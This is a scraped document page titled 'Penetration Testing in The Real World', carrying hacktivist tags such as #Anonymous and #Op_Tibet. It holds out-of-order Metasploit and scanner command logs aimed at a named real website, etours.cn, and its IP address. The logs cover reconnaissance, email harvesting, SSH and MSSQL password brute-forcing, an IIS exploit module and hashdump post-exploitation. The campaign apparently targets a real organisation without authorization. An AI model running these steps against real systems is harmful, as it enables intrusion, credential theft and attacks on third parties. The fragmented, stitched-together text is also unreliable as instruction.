[*] Module auxiliary/scanner/http/brute_dirs
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Module auxiliary/scanner/http/dir_scanner
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Module auxiliary/scanner/http/files_dir
[*] Module auxiliary/scanner/http/http_put
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Module auxiliary/scanner/http/trace_axd
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*]
=[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*]
=[ Query testing ]=
============================================================
[*]
=[ General testing ]=
============================================================
[*] Done.
RUN THE EXPLOIT
msf5 > wmap_run -e

CHECK THE VULNERABILITIES
msf5 > wmap_vulns -l
EXECUTE VULNERABILITIES
msf > vulns
RUN DB_NMAP THROUGH METASPLOIT
msf5 > db_nmap 184.154.192.250 -Pn
msf5 > hosts
msf5 > hosts -c address,os_flavor
msf5 > hosts -c address,os_flavor -S Windows
msf5 > hosts -c address,os_flavor -S Windows -R
RHOSTS => 184.154.192.250
msf5 > services -h
msf5 > services -c name,info 184.154.192.250
msf5 > services -c name,info -S http
msf5 > services -c info,name -p 445
msf5 > services -c port,proto,state -p 70-81
msf5 > services -s http -c port 184.154.192.250
msf5 > search IIS
msf5 > use exploit/windows/iis/msadc
msf5 exploit(windows/iis/msadc) > run
msf5 > search mssql_login
Matching Modules
================
# Name Disclosure Date Rank Check

Description
- ---- --------------- ---- -----
-----------
0 auxiliary/scanner/mssql/mssql_login normal No MSSQL
Login Utility
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > show options
msf5 auxiliary(scanner/mssql/mssql_login) > set USERNAME sa

msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE
/opt/commix/src/txt/passwords_john.txt
msf5 auxiliary(scanner/mssql/mssql_login) > run
msf5 auxiliary(scanner/mssql/mssql_login) > creds

Credentials
===========
host origin service public private realm private_type JtR Format

---- ------ ------- ------ ------- ----- ------------ ----------
msf5 auxiliary(scanner/mssql/mssql_login) > back

msf5 > loot -h
Usage: loot [options]
Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] -t [type]
Del: loot -d [addr1 addr2 ...]
-a,--add Add loot to the list of addresses, instead of listing

-d,--delete Delete *all* loot matching host and type
-f,--file File with contents of the loot to add
-i,--info Info of the loot to add
-t <type1,type2> Search for a list of types
-h,--help Show this help information
-S,--search Search string to filter by
Here’s an example of how one would populate the database with some ‘loot’.
msf exploit(usermap_script) > exploit
msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > show options
msf post(hashdump) > sessions -l
msf post(hashdump) > run
USE LOOT
msf post(hashdump) > loot
RELOAD ALL METASPLOIT MODULES
msf > reload_all
USE ARP_SWEEP
msf > use auxiliary/scanner/discovery/arp_sweep

msf auxiliary(arp_sweep) > show options
msf auxiliary(arp_sweep) > set RHOSTS TARGET/24
RHOSTS => TARGET/24
msf auxiliary(arp_sweep) > set THREADS 50
THREADS => 50
msf auxiliary(arp_sweep) > run
USE NMAP
msf > nmap -sn TARGET/24
msf > nmap -PU -sn TARGET/24
msf > nmap -O TARGET
SEARCH PORTSCAN
msf > search portscan
USE PORTSCAN
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS TARGET
RHOSTS => TARGET
msf auxiliary(syn) > set THREADS 200
THREADS => 200
msf auxiliary(syn) > run
SEARCH NAME_VERSION
msf > search name:_version
USE TELNET AUXILIARY SCANNER
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set RHOSTS TARGET/24
RHOSTS => TARGET/24
msf auxiliary(telnet_version) > set THREADS 100
THREADS => 100
msf auxiliary(telnet_version) > run
USE AUXILIARY SSH_VERSION

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > show options
Module options (auxiliary/scanner/ssh/ssh_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
TIMEOUT 30 yes Timeout for the SSH probe
msf auxiliary(ssh_version) > set RHOSTS TARGET/24
RHOSTS => TARGET/24
msf auxiliary(ssh_version) > set THREADS 200
THREADS => 200
msf auxiliary(ssh_version) > run
USE ORACLE SCANNER
msf auxiliary(ssh_version) > use auxiliary/scanner/oracle/tnslsnr_version
msf auxiliary(tnslsnr_version) > show options
Module options (auxiliary/scanner/oracle/tnslsnr_version):
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
msf auxiliary(tnslsnr_version) > set RHOSTS TARGET/24
RHOSTS => TARGET/24
msf auxiliary(tnslsnr_version) > set THREADS 200
THREADS => 200
msf auxiliary(tnslsnr_version) > run
USE OPEN_PROXY
msf auxiliary(open_proxy) > show options

Module options (auxiliary/scanner/http/open_proxy):
---- --------------- -------- -----------
LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via

RIPE.net
MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
RANDOMIZE_PORTS false no Randomize the order the ports are probed
RHOSTS 24.25.24.1-xx.xx.xx.xx.xx yes The target address range or CIDR identifier
SITE www.google.com yes The web site to test via alleged web proxy (default is
www.google.com)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-
Agent sent in the request
VERIFY_CONNECT true no Enable test for CONNECT method
VERIFY_HEAD false no Enable test for HEAD method
ValidCode 200,302 no Valid HTTP code for a successfully request
ValidPattern server: gws
USE SSH_LOGIN
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS TARGET
RHOSTS => TARGET
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(ssh_login) > set THREADS 2000
THREADS => 2000
msf auxiliary(ssh_login) > run
USE AUXILIARY DIR_SCANNER
msf > use auxiliary/scanner/http/dir_scanner

msf auxiliary(dir_scanner) > set THREADS 50
THREADS => 50
msf auxiliary(dir_scanner) > set RHOSTS TARGET
RHOSTS => TARGET
msf auxiliary(dir_scanner) > exploit
USE EMAIL_COLLECTOR
msf > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > set DOMAIN TARGET
DOMAIN => TARGET
msf auxiliary(search_email_collector) > run
USE AUXILIARY SCANNER HTTP CRAWLER
msf > use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST TARGET
RHOST => TARGET
msf auxiliary(crawler) > run
[*] Crawling http://TARGET:80/...
[*] Crawl of http://TARGET:80/ complete
[*] Auxiliary module execution completed
openvasad -c add_user -u admin -r Admin
openvasmd --user=admin --new-password=admin
openvas_target_create “windows” TARGET “new_scan”
msf > load openvas
[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
[*]
[*] OpenVAS integration requires a database connection. Once the
[*] database is ready, connect to the OpenVAS server using openvas_connect.
[*] For additional commands use openvas_help.
[*]
[*] Successfully loaded plugin: OpenVAS

msf > openvas_connect admin admin localhost 9390 ok
msf > openvas_help
[*] openvas_help Display this help
[*] openvas_debug Enable/Disable debugging
[*] openvas_version Display the version of the OpenVAS server
[*]
[*] CONNECTION
[*] ==========
[*] openvas_connect Connects to OpenVAS
[*] openvas_disconnect Disconnects from OpenVAS
[*]
[*] TARGETS
[*] =======
[*] openvas_target_create Create target
[*] openvas_target_delete Deletes target specified by ID
[*] openvas_target_list Lists targets
[*]
[*] TASKS
[*] =====
[*] openvas_task_create Create task
[*] openvas_task_delete Delete a task and all associated reports
[*] openvas_task_list Lists tasks
[*] openvas_task_start Starts task specified by ID
[*] openvas_task_stop Stops task specified by ID
[*] openvas_task_pause Pauses task specified by ID
[*] openvas_task_resume Resumes task specified by ID
[*] openvas_task_resume_or_start Resumes or starts task specified by ID
[*]
[*] CONFIGS
[*] =======
[*] openvas_config_list Lists scan configurations
[*]
[*] FORMATS
[*] =======
[*] openvas_format_list Lists available report formats
[*]
[*] REPORTS
[*] =======
[*] openvas_report_list Lists available reports
[*] openvas_report_delete Delete a report specified by ID
[*] openvas_report_import Imports an OpenVAS report specified by ID
[*] openvas_report_download Downloads an OpenVAS report specified by ID
msf > openvas_config_list
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/openvas-omp-
0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use
Timeout.timeout instead.
[+] OpenVAS list of configs
ID Name
-- ----
085569ce-73ed-11df-83c3-002264764cea empty
2d3f051c-55ba-11e3-bf43-406186ea4fc5 Host Discovery
698f691e-7489-11df-9d8c-002264764cea Full and fast ultimate
708f25c4-7489-11df-8094-002264764cea Full and very deep
74db13d6-7489-11df-91b9-002264764cea Full and very deep ultimate
8715c877-47a0-438d-98a3-27c7a6ab2196 Discovery
bbca7412-a950-11e3-9109-406186ea4fc5 System Discovery
daba56c8-73ec-11df-a475-002264764cea Full and fast
msf > openvas_target_list
[+] OpenVAS list of targets
ID Name Hosts Max Hosts In Use Comment
-- ---- ----- --------- ------ -------
785ca141-93b1-4325-9117-040dbcd8297f “windows” TARGET 1 0 “new_scan”
b493b7a8-7489-11df-a3ec-002264764cea Localhost localhost 1 0
msf > openvas_task_create
[*] Usage: openvas_task_create <name> <comment> <config_id> <target_id>
msf > openvas_task_create "win" "test" 2d3f051c-55ba-11e3-bf43-406186ea4fc5

785ca141-93b1-4325-9117-040dbcd8297f
[*] f93de23e-ed04-4db9-9321-0e40d3c11d46
[+] OpenVAS list of tasks
ID Name Comment Status Progress
-- ---- ------- ------ --------
f93de23e-ed04-4db9-9321-0e40d3c11d46 win test New -1
msf > openvas_task_start f93de23e-ed04-4db9-9321-0e40d3c11d46
[*] <X><authenticate_response status='200'

status_text='OK'><role>Admin</role><timezone>UTC</timezone><severity>nist</severity
></authenticate_response><start_task_response status='202' status_text='OK, request
submitted'><report_id>68e8a43f-8f06-4bc4-92a3-
1fec76ea246b</report_id></start_task_response></X>
msf > openvas_task_list
[+] OpenVAS list of tasks
ID Name Comment Status Progress

-- ---- ------- ------ --------
f93de23e-ed04-4db9-9321-0e40d3c11d46 win test Done -1
msf >
openvas_report_list
openvas_format_list
openvas_report_download 1 5 /root/Desktop report
CHECK THE SITE WITH SKIPFISH
root@blackbox:~# locate skipfish | grep bin

/usr/bin/skipfish
root@blackbox:~# locate dictionaries
root@blackbox:~# skipfish -S /usr/share/skipfish/dictionaries/complete.wl -o

/tmp/scan http://etours.cn
EXAMPLES
Scan type: config
skipfish --config config/example.conf http://example.com
Scan type: quick
skipfish -o output/dir/ http://example.com
Scan type: extensive bruteforce
skipfish [...other options..] -S dictionaries/complete.wl
http://example.com
Scan type: without bruteforcing
skipfish [...other options..] -LY http://example.com
Scan type: authenticated (basic)
skipfish [...other options..] -A username:password http://example.com
Scan type: authenticated (cookie)
skipfish [...other options..] -C jsession=myauthcookiehere -X /logout
http://example.com
Scan type: flaky server
skipfish [...other options..] -l 5 -g 2 -t 30 -i 15 http://example.com
OPEN SKIPFISH RESULTS WITH FIREFOX

In terminal:
Report
------
A report has been generated in the file /tmp/scan_report
Open /tmp/scan_report/index.html with a browser to see this report
CHECK THE SITE WITH WAPITI
root@blackbox:~# aptitude install wapiti
root@blackbox:~# wapiti --url http://etours.cn/ --scope folder -v 1 -f html -o

/tmp/scan_report
USE BLINDELEPHANT
root@blackbox:~# cd /opt/
root@blackbox:/opt# git clone https://github.com/lokifer/BlindElephant.git
root@blackbox:/opt# cd BlindElephant/src/
root@blackbox:/opt/BlindElephant/src# python setup.py install
root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn movabletype
root@blackbox:/opt/BlindElephant/src# BlindElephant.py etours.cn guess
Probing...
ACUNETIX SCAN
https://pasteboard.co/ISeK7WC.jpg
https://pasteboard.co/ISeKyZk.jpg
#Anonymous #TheCreed #blackhat_global #GBN

#Penetration Testing in The Real World

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

#Penetration Testing in The Real World

Загружено:

Авторское право:

Доступные форматы

/$$ /$$ /$$ /$$ /$$

#Op_Tibet #Tibet #February 2020

PENETRATION TESTING IN THE REAL WORLD...

root@blackbox:~# git clone https://github.com/jeanphorn/wordlist.git

NSLOOKUP DNS RECORDS A, NS, MX

> set type=NS

Authoritative answers can be found from:

> set type=MX

Authoritative answers can be found from:

DIG DNS RECORDS A, NS, MX

root@blackbox:/# dig etours.cn A

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn A

;; Query time: 1069 msec

root@blackbox:/# dig etours.cn NS

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn NS

;; Query time: 44 msec

root@blackbox:/# dig etours.cn MX

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> etours.cn MX

;; Query time: 49 msec

root@blackbox:/opt# whois etours.cn

root@blackbox:/opt# dmitry -winsepfb host 184.154.192.250

Gathered Inet-whois information for 184.154.192.250

inetnum: 180.235.0.0 - 184.255.255.255

role: Internet Assigned Numbers Authority

Gathered Inic-whois information for server.etours.cn

Gathered Netcraft information for server.etours.cn

Retrieving Netcraft.com information for server.etours.cn

Gathered Subdomain information for server.etours.cn

Gathered E-Mail information for server.etours.cn

Gathered TCP Port information for 184.154.192.250

All scans completed, exiting

root@blackbox:/opt# dmitry -winsepfb host etours.cn

Gathered Inet-whois information for 184.154.192.250

inetnum: 180.235.0.0 - 184.255.255.255

role: Internet Assigned Numbers Authority

Gathered Inic-whois information for etours.cn

Gathered Netcraft information for etours.cn

Retrieving Netcraft.com information for etours.cn

Gathered Subdomain information for etours.cn

Gathered E-Mail information for etours.cn

Gathered TCP Port information for 184.154.192.250

All scans completed, exiting

SEND A GET REQUEST

Tel: (+86) 10 67160201 ext 1006, 1007

TEST EMAIL ADDRESS

Testing e-mail address: booking@etours.cn

Opening up socket to mail.etours.cn... Succes!

TRANSLATE REGISTRANT NAME:

[*] Target: etours.cn

[*] Emails found: 1

Testing e-mail address: tourism@etours.cn

Opening up socket to mail.etours.cn... Succes!

[*] Hosts found: 46

WhatWeb - Next generation web scanner version 0.5.1.

root@blackbox:~# git clone https://github.com/urbanadventurer/WhatWeb.git

root@blackbox:~/WhatWeb# ./whatweb -v -a 4 etours.cn

WhatWeb report for http://www.etours.cn/

Summary : Script[text/javascript], Meta-Author[www.eTours.cn],

Google Dorks: (3)

String : Apache (from server string)

String : PleskLin (from x-powered-by string)

root@blackbox:/opt# dirb http://184.154.192.250/

START_TIME: Wed Jan 22 15:18:24 2020